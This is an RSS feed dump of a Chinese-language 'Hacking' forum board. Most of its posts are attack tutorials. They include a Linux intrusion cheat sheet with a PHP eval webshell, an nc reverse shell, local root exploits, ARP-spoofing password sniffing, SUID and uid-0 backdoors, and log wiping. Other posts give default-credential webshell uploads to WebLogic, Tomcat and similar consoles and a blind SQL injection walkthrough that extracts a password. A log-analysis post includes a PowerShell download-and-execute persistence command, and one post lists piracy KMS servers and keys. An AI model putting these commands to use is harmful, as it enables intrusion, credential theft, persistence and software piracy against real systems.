Hacking - ITProSec Resources Forum https://itprosec.com/community/hacking/ ITProSec Resources Discussion Board en-US Wed, 03 Jun 2026 22:58:34 +0000 wpForo 60 吾爱破解专用虚拟机系统不能安装VMwaretools问题! https://itprosec.com/community/hacking/%e5%90%be%e7%88%b1%e7%a0%b4%e8%a7%a3%e4%b8%93%e7%94%a8%e8%99%9a%e6%8b%9f%e6%9c%ba%e7%b3%bb%e7%bb%9f%e4%b8%8d%e8%83%bd%e5%ae%89%e8%a3%85vmwaretools%e9%97%ae%e9%a2%98%ef%bc%81/ Wed, 21 Apr 2021 00:49:38 +0000 先把论坛下载的虚拟机系统解压到自己要保存的盘符! 然后 找到里面的Windows XP By 52PoJie.vmx 这个文件 用记事本打开。

monitor_control.restrict_backdoor = "TRUE"  
monitor_control.disable_directexec = "TRUE"
isolation.tools.hgfs.disable = "TRUE"
isolation.tools.getVersion.disable = "TRUE" 

把这4项目的    "TRUE" 更改成"FALSE"   然后重启虚拟机 就可以安装了,    记得安装完后改回去。想必这个是防止软件检测虚拟机的,有很多软件是不允许在虚拟机里运行的!!  
PS: 论坛虚拟机是自带Vmwaretools 的不要到处去找了。就在虚拟机安装的目录下有个C:\Program Files (x86)\VMware\VMware Workstation\windows.iso  自己定制硬件定制一个光驱加载下这个ISO就可以啦!!

]]> Hacking tai chi https://itprosec.com/community/hacking/%e5%90%be%e7%88%b1%e7%a0%b4%e8%a7%a3%e4%b8%93%e7%94%a8%e8%99%9a%e6%8b%9f%e6%9c%ba%e7%b3%bb%e7%bb%9f%e4%b8%8d%e8%83%bd%e5%ae%89%e8%a3%85vmwaretools%e9%97%ae%e9%a2%98%ef%bc%81/ 通过一个攻击案例来进行windows日志分析,在Windows日志里发现入侵痕迹 https://itprosec.com/community/hacking/%e9%80%9a%e8%bf%87%e4%b8%80%e4%b8%aa%e6%94%bb%e5%87%bb%e6%a1%88%e4%be%8b%e6%9d%a5%e8%bf%9b%e8%a1%8cwindows%e6%97%a5%e5%bf%97%e5%88%86%e6%9e%90%e5%9c%a8windows%e6%97%a5%e5%bf%97%e9%87%8c%e5%8f%91/ Tue, 16 Feb 2021 15:15:19 +0000

有小伙伴问:Windows系统日志分析大多都只是对恶意登录事件进行分析的案例,可以通过系统日志找到其他入侵痕迹吗?

答案肯定是可以的,当攻击者获取webshell后,会通过各种方式来执行系统命令。所有的web攻击行为会存留在web访问日志里,而执行操作系统命令的行为也会存在在系统日志。

不同的攻击场景会留下不一样的系统日志痕迹,不同的Event ID代表了不同的意义,需要重点关注一些事件ID,来分析攻击者在系统中留下的攻击痕迹。

我们通过一个攻击案例来进行windows日志分析,从日志里识别出攻击场景,发现恶意程序执行痕迹,甚至还原攻击者的行为轨迹。

1、信息收集

攻击者在获取webshell权限后,会尝试查询当前用户权限,收集系统版本和补丁信息,用来辅助权限提升。

whoami
systeminfo

Windows日志分析:

在本地安全策略中,需开启审核进程跟踪,可以跟踪进程创建/终止。关键进程跟踪事件和说明,如:

4688 创建新进程
4689 进程终止

我们通过LogParser做一个简单的筛选,得到Event ID 4688,也就是创建新进程的列表,可以发现用户Bypass,先后调用cmd执行whami和systeminfo。Conhost.exe进程主要是为命令行程序(cmd.exe)提供图形子系统等功能支持。

LogParser.exe  -i:EVT "SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,'|')  as UserName,EXTRACT_TOKEN(Strings,5,'|')  as ProcessName FROM c:\11.evtx where EventID=4688"

2、权限提升

通过执行exp来提升权限,获取操作系统system权限,增加管理用户。

ms16-032.exe "whoami"
ms16-032.exe "net user test1 abc123! /add"
ms16-032.exe "net localgroup Administrators test1 /add"

Windows日志分析:

在本地安全策略中,需开启审核账户管理,关键账户管理事件和说明。如:

4720  创建用户
4732  已将成员添加到启用安全性的本地组

这里会涉及进程创建,主要关注账户创建和管理用户组变更。从Event ID 4720 ,系统新建了一个test用户,从Event ID 4732的两条记录变化,得到一个关键信息,本地用户test从user组提升到Administrators。

3、管理账号登录

在创建管理账户后,尝试远程登录到目标主机,获取敏感信息。

mstsc /v 10.1.1.188

Windows日志分析:

在本地安全策略中,需开启审核登录事件,关键登录事件和说明,如:

4624 登录成功
4625 登录失败

LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,'|') as EventType,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings,18,'|') as Loginip FROM C:\3333.evtx where EventID=4624"

使用LogParser做一下分析,得到系统登录时间,登录类型10 也就是远程登录,登录用户 test,登录IP:10.1.1.1。

4、权限维持

通过创建计划任务执行脚本后门,以便下次直接进入,使用以下命令可以一键实现:

schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.1.1.1:8888/logo.txt\"\"\"))\""

Windows日志分析:

在本地安全策略中,需开启审核对象访问,关键对象访问事件,如:

4698  创建计划任务
4699  删除计划任务

这里涉及进程创建和对象访问事件,包括schtasks.exe进程的创建和Event ID 4698发现新建的计划任务。成功找到计划任务后门位置:

本文分享自微信公众号 - Bypass(Bypass--),作者:Bypass

]]> Hacking tai chi https://itprosec.com/community/hacking/%e9%80%9a%e8%bf%87%e4%b8%80%e4%b8%aa%e6%94%bb%e5%87%bb%e6%a1%88%e4%be%8b%e6%9d%a5%e8%bf%9b%e8%a1%8cwindows%e6%97%a5%e5%bf%97%e5%88%86%e6%9e%90%e5%9c%a8windows%e6%97%a5%e5%bf%97%e9%87%8c%e5%8f%91/ 查看Windows凭据储存的密码 https://itprosec.com/community/hacking/%e6%9f%a5%e7%9c%8bwindows%e5%87%ad%e6%8d%ae%e5%82%a8%e5%ad%98%e7%9a%84%e5%af%86%e7%a0%81-2/ Sun, 10 May 2020 11:56:55 +0000 web凭据 我们输入当前用户及密码就能查看了。可是 Windows凭据 无法查看密码。

Windows凭据

所以我们需要另外的软件来查看:Network Password Recovery

访问上面的网址,往下拉就能看到下载地址。注意区分64位和32位。

该软件不用安装,打开后获取管理员权限即可运行。

networkpasswordrecovery

备用下载地址:

http://pikachu.im/other/netpass-x64.zip

链接: https://pan.baidu.com/s/1lBUW-nT9mC1L5M5Nc7fp7g 提取码: bcg1

]]> Hacking tai chi https://itprosec.com/community/hacking/%e6%9f%a5%e7%9c%8bwindows%e5%87%ad%e6%8d%ae%e5%82%a8%e5%ad%98%e7%9a%84%e5%af%86%e7%a0%81-2/ Office Tool Plus 安装 Office 2019 教程 https://itprosec.com/community/hacking/office-tool-plus-%e5%ae%89%e8%a3%85-office-2019-%e6%95%99%e7%a8%8b/ Mon, 20 Apr 2020 19:04:49 +0000 该教程源自官方教程以及本人亲自测试稳定可用,故整理分享。
本教程可能不是安装 Office 2019 唯一的方法,却是应用最广泛,错误率最低的安装方法。如果您在安装过程中遇到了任何错误,请自行检查配置是否出错。如果是因为系统问题:比如是某风的 GHO 或者系统之家的 GHO 系统,请使用 ISO 镜像重新安装最新版的原版 Windows。对于因为使用 360 安全卫士以及电脑管家、金山毒霸等而造成的安装程序无法正常进行亦或者是激活出错的,请使用者自行解决问题并承担所有可能的后果。
有条件请支持正版!

一、准备工具

去官网 https://otp.landian.vip/zh-cn/下载OTP(Office Tool Plus)工具。
打开软件,会显示如下的界面。

 
如果电脑上已经安装了其他版本的Office和相关插件等工具,需要先卸载,卸载完毕后需要重启电脑,卸载可以在OTP工具中进行。

二、在线安装

 

 
Office 套件务必选择 ProPlus2019Volume,产品可以根据个人情况来决定是否选择安装 Visio 或者 Project,如需安装,请按图所示选择对应的产品 ID,否则,该选项请留空。
通道如图选择 PerpetualVL2019。体系架构可以按照需求选择,如无需要,默认 x86 即可。应用程序按需选择,语言按需选择。如果不会设置的请如图所示进行设置以安装简体中文版的 Office 2019,包含 Word、PowerPoint、Excel。

三、激活

注意:此激活方式为 180 天的 7 天周期循环激活,在联网的情况下,您无需担心激活过期,也不必手动续期。
选择 Office 2019 Volume 证书,并点击安装许可证按钮。,密钥管理不用填,在 KMS 管理内输入 KMS 地址,并点击设定服务器按钮,设定完成后,请返回此页此页面
 
 
然后点击激活按钮,Office 2019 将会尝试激活,激活成功后,你应该看到如下的结果:

 

四、常见问题

一般来说,按照步骤操作,一次性就可以成功。如果仍然没有安装成功,检查是否卸载原有WPS,OFFICE等。
1.如果激活提示出错,或显示错误代码。要使用的工具箱中的“修复OFFICE无法正常激活”。另外在“安装许可证”和“安装密钥”旁的三角箭头,选择“删除许可证”和“卸载密钥”。然后按照上面步骤,重新三步走安装。
2.在工具箱找相关文档查询。
3.在OTP官网上学习官方提供的安装技术。
附:KMS服务器地址以及2个密钥
kms.loli.beer
kms.loli.cab
kms.90zm.xyz
kms.cangshui.net
kms.03k.org
kms.myftp.org
zh.us.to
kms.chinancce.com
kms.digiboy.ir
kms.luody.info
kms.mrxn.net
kms8.MSGuides.com
xykz.f3322.org
kms.bige0.com
kms.shuax.com
kms9.MSGuides.com
kms.lotro.cc
www.ddddg.cn
cy2617.jios.org
enter.picp.net
NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP
9BGNQ-K37YR-RQHF2-38RQ3-7VCBB

]]> Hacking tai chi https://itprosec.com/community/hacking/office-tool-plus-%e5%ae%89%e8%a3%85-office-2019-%e6%95%99%e7%a8%8b/ 搭建kms服务器(docker) https://itprosec.com/community/hacking/%e6%90%ad%e5%bb%bakms%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%88docker%ef%bc%89/ Sat, 18 Apr 2020 16:50:13 +0000 kms服务器能让我们激活VOL版的Windows及office。

kms有效期是180天。到期如果kms服务器仍然可用,会自动续期。

不需要再去找乱七八糟、可能含有病毒的激活工具。

用docker搭建kms

docker pull luodaoyi/kms-server
docker run -d -p 1688:1688 --restart=always --name="kms" luodaoyi/kms-server

记得防火墙开放1688的端口

使用kms

激活Windows

配置使用 KMS 服务器

slmgr /skms 你的服务器ip:端口

上面的命令如果是默认的1688端口,则不需要特意指定端口

启用激活

slmgr /ato

查看激活状态

slmgr /xpr

激活office

定位office版本及目录

if exist "C:\Program Files (x86)\Microsoft Office\Office14\ospp.vbs" (cd "C:\Program Files (x86)\Microsoft Office\Office14") else (cd "c:\Program Files\Microsoft Office\Office14")
if exist "C:\Program Files (x86)\Microsoft Office\Office15\ospp.vbs" (cd "C:\Program Files (x86)\Microsoft Office\Office15") else (cd "c:\Program Files\Microsoft Office\Office15")
if exist "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" (cd "C:\Program Files (x86)\Microsoft Office\Office16") else (cd "c:\Program Files\Microsoft Office\Office16")

office16是office2016,office15就是2013,office14就是2010

配置使用 KMS 服务器

cscript ospp.vbs /sethst:你的服务器IP或域名
cscript ospp.vbs /setprt:1688

如使用默认端口,第二条命令不需要

启用激活

cscript ospp.vbs /act

查看激活状态

cscript ospp.vbs /dstatus

将上面的命令放到批处理文件能实现快速激活

参考:Linux 自建 KMS 服务器

相关:Docker使用心得

下载Windows及office:MSDN I tell you

GVLK相关:
Office 2019 & Office 2016:https://docs.microsoft.com/en-us/DeployOffice/vlactivation/gvlks
Office 2013:https://technet.microsoft.com/zh-cn/library/dn385360.aspx
Office 2010:https://technet.microsoft.com/zh-cn/library/ee624355(v=office.14).aspx
Windows:https://docs.microsoft.com/zh-cn/windows-server/get-started/kmsclientkeys

]]> Hacking tai chi https://itprosec.com/community/hacking/%e6%90%ad%e5%bb%bakms%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%88docker%ef%bc%89/ 学习黑客十大经典书籍榜单 https://itprosec.com/community/hacking/%e5%ad%a6%e4%b9%a0%e9%bb%91%e5%ae%a2%e5%8d%81%e5%a4%a7%e7%bb%8f%e5%85%b8%e4%b9%a6%e7%b1%8d%e6%a6%9c%e5%8d%95/ Tue, 07 Apr 2020 01:54:22 +0000 《安全漏洞追踪》:书很老,但这本书影响蛮大的,看了这书,才真正把安全意识带入到实际开发中。

《灰帽黑客》:去年出了新版,老版本时,书里面涉及很多,渗透到漏洞分析。

《网络黑白》:真正值得看的就这一本了,伙伴们:)最近卖得很火,都快绝版了,黑客入门到精通。

《web前端黑客》:余弦的书,专注前端方面的书,必须赞一个,我个人比较喜欢看专注某一个方面的书。

《白帽子讲Web安全》:刺的书,web安全方面涉及很多,不过总体有点偏向企业级的。

《黑客攻防技术宝典:Web实战篇》:里面罗列的很多让我反而更觉得这书给搞安全开发的人看更合适:

《sql注入攻击与防御》:一本专注讲sql注入的,现在看来都还是很不错,有很多技巧。

《反欺骗的艺术》:社会工程鼻祖,凯文米特尼克的书,毫无疑问上榜单。

《线上幽灵》 凯文的自传

《Metasploit渗透测试指南》 黑客小白进阶之后学习渗透推荐书,还是有帮助的。

]]> Hacking tai chi https://itprosec.com/community/hacking/%e5%ad%a6%e4%b9%a0%e9%bb%91%e5%ae%a2%e5%8d%81%e5%a4%a7%e7%bb%8f%e5%85%b8%e4%b9%a6%e7%b1%8d%e6%a6%9c%e5%8d%95/ 黑客如何入侵Linux服务器?掌握这几个命令够了 https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%a6%82%e4%bd%95%e5%85%a5%e4%be%b5linux%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%9f%e6%8e%8c%e6%8f%a1%e8%bf%99%e5%87%a0%e4%b8%aa%e5%91%bd%e4%bb%a4%e5%a4%9f%e4%ba%86/ Mon, 06 Apr 2020 02:28:55 +0000 写个php一句话后门上去:

$ echo -e "<?php @eval($_POST)?>" >rankuplog_time.php

$ cat rankuplog_time.php

1、linux的想着先跨站。
shell浏览目标站不行,命令行下输入ls -la /www.users/

2、溢出提权
# python –c ‘impotr pty;pty.spawn(“/bin/sh”);



来得到交互的Shell,一般的系统都默认安装python



输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,
输入uname –r
返回:2.6.18-164.11.1.el5PAE


Linux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出

找对应的exp, 这里地址整理很齐全可以这里下



http://tools.90sec.org/

http://sebug.net/paper/linux_exp/

http://x73.cc/bitch/exp/

http://www.exploit-db.com/search/



命令输入pwd,这个命令是显示当前目录,

先看能不能编译  gcc -help



当前目录就是shell的目录,我在shell上传2.c

反弹shell  到外网自己机器的12345端口  

上外网服务器 本地监听 nc -lvvp 12345

一般都能得到一个apache交互的shell 有时候又不行



这时候  



# python -c 'impotr pty;pty.spawn("/bin/sh");'
cd /tmp        进入tmp目录
mkdir Papers   创建一个Papers的目录 Papers不显眼
cd Papers      进入 Papers目录
pwd            查看当前目录   
然后命令输入
wget 下载exp
gcc –o 2 2.c  //把2.c编译成可执行文件 g++ keio.cc -o keio
chmod +x 2     //给2有执行权限
./2            //执行2,  溢出
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet


确定arpsniffer.c需要先装pcap和 libnet。



rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net ... 00&big_mirror=0
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install


重新编译arpsniffer.c



gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet


这次没报错,编译成功。



./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254


下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77)



./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110


在另一个登录里面用tcpdump监听下



tcpdump -i eth0 host 192.168.0.11


发现有数据,把监听的数据存在文件里面:



tcpdump -i eth0 host 172.16.0.12 -w pop.txt


10分钟后停止,在SecureCRT下用sz命令下载pop.txt到本地,然后用Ethereal分析。



下面我们就可以用linsniffer监听我们想要的用户名和密码了。



先修改linsniffer.c:根据自己的需求监听相应的应用密码。我的如下:



if(ntohs(tcp->dest)==21)  p=1; /* ftp */
if(ntohs(tcp->dest)==22)  p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23)  p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1;  /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!


不用管警告,直接运行编译后的linsniffer即可。



# ./linsniffer



用户名和密码都自动存到了tcp.log下。

3、利用跨站代码
linux不提权跨目录访问的代码

linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。

在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。



代码如下:



$path = stripslashes($_GET);
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>


把上面代码保存为tmdsb.PHP

然后访问http://www.tmdsb.com/tmdsb.php?path=../../要跨的目录/index.php



这里的index.PHP是要修改权限的文件。

收集的另一个exp:

把下面的代码保存为exp.PHP



代码:



@$filename = stripslashes($_POST);
@$mess = stripslashes($_POST);
$fp = @fopen({$_POST}, 'a');
@fputs($fp,$mess
);
@fclose($fp);
?>
4.2.618最终Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)这个0day溢出成功
udev提权

换了个udev提权,适用于内核范围为2.6.*。

还是上传文件至服务器shell所在目录,执行命令ls,发现文件已经躺在那里面了,之后赋予exp执行权限。



chmod +x pwnkernel.c
chmod +x wunderbar_emporium.sh
chmod +x exploit.c
之后执行溢出./w*


成功溢出,root权限。



之后就是留下一个后门~ 添加一个root权限用户俺也不介意。。。(useradd -u 0 -o "username")



依次输入命令



cd /tmp
sh-3.1# ls /lib/ld-linux*
/lib/ld-linux.so.2
sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven
sh-3.1# ls -l .str1ven
-rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven
sh-3.1# chmod +s .str1ven
sh-3.1# ls -l .str1ven
-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven


成功建立一个后门,退出root,执行./.str1ven `which whoami`,又成功获取root权限~~

cat /etc/passwd 查看linux用户

cat /etc/shadow 查看用户密码需要root权限

cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息

ifconfig 查看本机ip信息

cat /etc/resolv.conf 查看DNS信息

bash -i 在反弹的shell中使用可以直观显示命令

bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以

Root登陆时,你的prompt会变成bash#。



系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。



echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,



vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!



netstat -an |grep LISTEN |grep :80 查看端口

service --status-all | grep running

service --status-all | grep http



查看运行服务

lsb_release -a 查看系统版本

重启ssh服务 :

/usr/sbin/sshd stop/

usr/sbin/sshd start

ssd_config文件里

PasswordAuthentication no,

将其改为

Pas





rdAuthentication yes

远程ssh才可登录

否则显示Access denied

其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

su的菜鸟用法

先chomod 777 /etc/passwd

然后修改bin用户的gid和uid为0

然后passwd设置bin的密码

然后cp /bin/bash /sbin/nologin

然后su的时候su - bin就可以到rootshell了。

这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码的一种很菜鸟的做法。



还可以这样



sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow




清空last记录 cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的

/etc/init.d/ssh start    开22端口

/etc/ssh/sshd_config SSH服务配置文件

]]> Hacking tai chi https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%a6%82%e4%bd%95%e5%85%a5%e4%be%b5linux%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%9f%e6%8e%8c%e6%8f%a1%e8%bf%99%e5%87%a0%e4%b8%aa%e5%91%bd%e4%bb%a4%e5%a4%9f%e4%ba%86/ 黑客入门web中间件拿shell-Weblogic https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8web%e4%b8%ad%e9%97%b4%e4%bb%b6%e6%8b%bfshell-weblogic/ Mon, 06 Apr 2020 02:27:38 +0000 1.weblogic

后台页面:(http为7001,https为7002)
Google关键字:WebLogic Server AdministrationConsole inurl:console
默认的用户名密码
1、用户名密码均为:weblogic
2、用户名密码均为:system
3、用户名密码均为:portaladmin
4、用户名密码均为:guest
上传地方:
workshop> Deployments> Web应用程序> 部署新的 Web 应用程序模块…
上传war的webshell。

上传后目标模块->部署。

2.Tomcat
后台:http://172.16.102.35:8080/manager/html
默认用户名密码
tomcat tomcat
上传地方:

Deploy之后即发布成功
shell地址:http://172.16.102.35:8080/magerx/test.jsp(其中magerx为war包的名字)

3.jboss
后台:http://172.16.102.35:9990
上传地方:Deployments>Manage Deployments>Add Content

Enable后即可发布
shell地址:
http://172.16.102.35:8080/magerx/test.jsp

4.JOnAS
后台:http://172.16.102.35:9000/jonasAdmin/
默认用户名密码:
jadmin jonas
tomcat tomcat
jonas jonas
上传地方:Deployment>Web Modules (WAR)>Upload


Apply之后即可发布
shell地址:http://172.16.102.35:9000/magerx/test.jsp

5.WebSphere
后台地址:https://172.16.102.35:9043/ibm/console/logon.jsp
上传地方:应用程序>新建应用程序>新建企业应用程序
 
接下来各种下一步,步骤4注意填好“上下文根”

完成后单击保存

回到应用程序>应用程序类型>WebSphere 企业应用程序

选中你上传的war包 这里是paxmac  点击启动 即可发布
shell地址:http://172.16.102.35:9080/paxmac/test.jsp
<!–
jsp文件打包,可以使用jdk/JRE自带的jar命令:
切换到要打包的文件目录
jar -cvf magerx.war  test.jsp –>

]]> Hacking tai chi https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8web%e4%b8%ad%e9%97%b4%e4%bb%b6%e6%8b%bfshell-weblogic/ 如何使用sql注入攻破一个网站? https://itprosec.com/community/hacking/%e5%a6%82%e4%bd%95%e4%bd%bf%e7%94%a8sql%e6%b3%a8%e5%85%a5%e6%94%bb%e7%a0%b4%e4%b8%80%e4%b8%aa%e7%bd%91%e7%ab%99%ef%bc%9f/ Mon, 06 Apr 2020 02:25:22 +0000 SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
黑客新手常用的sql注入就是使用一些注入工具,比如:啊D,明小子一些的简单sql注入工具。现在的网站能够用sql注入的漏洞已经很少了,一般政府和学校的网站漏洞比较多,可以作为肉鸡试一试。
下面讲一下早些年的sql简单方法:
首先我们在一个具备sql注入漏洞的网站开始实战测试(实验网站已经通知修复)
前提准备:

肉鸡网站:http://172.18.3.13:81/login.asp?name

用户名:admin 密码:admin

所需sql注入语句:

1.判断有无注入点
; and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

开始sql入侵:

SQL注入漏洞测试:

在正常用户名admin后增加一个单引号,单击"登录"
或在URL地址栏直接输入http://172.18.3.13:81/login.asp?name=admin'&pass=admin
若出错,证明没有对'进行过滤,存在SQL注入漏洞

在正常用户名admin后增加一个单引号,单击"登录"

出错

在URL地址栏直接输入http://172.18.3.13:81/login.asp?name=admin'&pass=admin

登录出错

登录出错,证明存在SQL注入漏洞。

3.SQL注入攻击

构造可以正常运行的目标地址

输入http://172.18.3.13:81/login.asp?name=admin &pass=admin' and '1=1
原SQL语句为SELECT * FROM data Where uname='admin',条件未变,但接收密码为admin' and '1=1
登录失败

输入http://172.18.3.13:81/login.asp?pass=admin&name=admin' and 1=1 and 'a'='a
原SQL语句为SELECT * FROM data Where uname='admin' and 1=1 and 'a'='a'
登录成功

可以正常运行的目标地址已经构造成功,此时可将1=1部分用SQL查询语句替代,依次对数据库表名、表中字段名、用户和密码长度、用户和密码进行测试

4. 猜解数据库表名

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (select count(*) from data)>0 and 'a'='a

成功,说明数据表名确为data;若不成功,则可反复测试,直至成功猜出表名
5. 猜解数据库字段名

http://172.18.3.13:81/login.asp?pass=admin&name=admin'and (select count(uname) from data)>0 and 'a'='a
若用户名字段确为uname,则提示登录成功
同理可猜出密码字段为upass

猜测用户名字段为name,登录出错

猜测用户名字段为uname,登录成功

猜测密码字段为upass,登录成功

说明数据库中密码字段为upass

6.猜解密码长度

已知有一用户名为"wucm",首先猜其密码长度大于1
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)>1)>0 and 'a'='a

成功,说明用户"wucm"的密码大于1, 继续猜测密码长度小于10

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)<10)>0 and 'a'='a

成功,说明"wucm"的密码长度小于10位,继续猜测其密码长度小于5

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)<5)>0 and 'a'='a 
出错,说明"wucm"的密码长度大于5位,继续猜测其密码长度大于8位

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)>8)>0 and 'a'='a

出错,说明"wucm"的密码长度小于8位,继续猜测其密码长度等于6位

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)=6)>0 and 'a'='a

成功,说明"wucm"的密码长度为6位

7.猜解密码

根据前面的测试我们已经知道该用户的密码长度位6位,接下来对密码进行逐位猜测:

首先测试第一位是否为数字

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)<'9')>0 and 'a'='a

出错,说明密码第一位不是数字, 测试是否位字母

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)>'a')>0 and 'a'='a

成功,基本说明密码第一位是字母, 接下来重复测试,不断缩小字母范围,最后确定密码第一位为字母"w"

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)='w')>0 and 'a'='a 
成功,说明密码第一位位"w"

同理对6位密码逐位进行猜测,最后得到密码为"wcm987"

至此我们就猜测出用户"wucm"的密码为"wcm987",进行登陆测试:

76d6e7db6a9c2f78bfd762160b08ac95.jpg (51.41 KB, 下载次数: 47)

 

76d6e7db6a9c2f78bfd762160b08ac95.jpg

4773735f9deb76f05b8999dcdd2af7e4.jpg (37.54 KB, 下载次数: 51)

 

4773735f9deb76f05b8999dcdd2af7e4.jpg

9921e5e152ecb621830597471226f19d.jpg (38.36 KB, 下载次数: 42)

 

9921e5e152ecb621830597471226f19d.jpg

69e203f20ab425e66aa8d501e3edbef3.jpg (39.5 KB, 下载次数: 49)

 

69e203f20ab425e66aa8d501e3edbef3.jpg

a6007998e3a60c80bf3d7499156857e9.jpg (39.01 KB, 下载次数: 41)

 

a6007998e3a60c80bf3d7499156857e9.jpg

143bb4eb673d0d767d265efd92b049eb.jpg (34.44 KB, 下载次数: 45)

 

143bb4eb673d0d767d265efd92b049eb.jpg

b5ff46b394133fa4d7b5322438377127.jpg (38.3 KB, 下载次数: 51)

 

b5ff46b394133fa4d7b5322438377127.jpg

ae98c9803c46517ba51421ad7900e09c.jpg (38.74 KB, 下载次数: 50)

 

